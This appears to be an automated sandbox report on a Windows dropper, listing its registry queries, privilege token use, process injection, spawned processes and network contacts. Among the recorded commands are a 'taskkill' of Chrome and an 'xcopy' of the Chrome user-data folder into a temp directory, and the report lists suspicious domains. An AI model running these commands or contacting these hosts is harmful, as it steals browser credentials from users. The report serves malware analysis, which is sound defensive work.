Looks up geolocation information via web service

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\f34b9ab9db6d16.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e010.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\4f5baa1083db067.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\c862a054a35.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1148 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe
PID 2532 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 4948 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2324 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 640 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 1056 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 4560 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 4968 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4968 wrote to memory of 4480 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e010.exe
PID 2324 wrote to memory of 4740 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe
PID 4628 wrote to memory of 3220 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e1.exe
PID 1056 wrote to memory of 4564 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\c862a054a35.exe
PID 2104 wrote to memory of 1016 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe
PID 640 wrote to memory of 1304 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\53516815d3135fe3.exe
PID 4948 wrote to memory of 3596 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe
PID 1964 wrote to memory of 4692 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\f34b9ab9db6d16.exe
PID 3696 wrote to memory of 4040 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe
PID 4560 wrote to memory of 1308 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\4f5baa1083db067.exe
PID 3220 wrote to memory of 4188 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e1.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
PID 4480 wrote to memory of 3744 N/A C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e010.exe C:\Users\Admin\AppData\Local\Temp\chrome2.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08240101651be7e1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 9aa6e16872.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 1710990cbc64.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 53516815d3135fe3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c c862a054a35.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 4f5baa1083db067.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f34b9ab9db6d16.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c e4b2f18fb52218.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 453c5fa76a849.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 08240101651be7e010.exe

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e010.exe

08240101651be7e010.exe

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe

1710990cbc64.exe

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\08240101651be7e1.exe

08240101651be7e1.exe

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\c862a054a35.exe

c862a054a35.exe

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\453c5fa76a849.exe

453c5fa76a849.exe

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\53516815d3135fe3.exe

53516815d3135fe3.exe

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\9aa6e16872.exe

9aa6e16872.exe

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\f34b9ab9db6d16.exe

f34b9ab9db6d16.exe

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\e4b2f18fb52218.exe

e4b2f18fb52218.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2532 -ip 2532

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 564

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\4f5baa1083db067.exe

4f5baa1083db067.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC74907B7\1710990cbc64.exe" -a

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1016 -ip 1016

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732527216 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1016 -s 356

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\xcopy.exe

xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4188 -s 1136

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 172.67.75.166:443 db-ip.com tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 api.db-ip.com udp
US 172.67.75.166:443 api.db-ip.com tcp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.17.27.25:80 www.maxmind.com tcp
GB 37.0.8.235:80 tcp
US 8.8.8.8:53 166.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.130.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 c.pki.goog udp
US 8.8.8.8:53 25.27.17.104.in-addr.arpa udp
US 8.8.8.8:53 233.130.159.162.in-addr.arpa udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.18:443 prophefliloc.tumblr.com tcp
N/A 127.0.0.1:62806 tcp
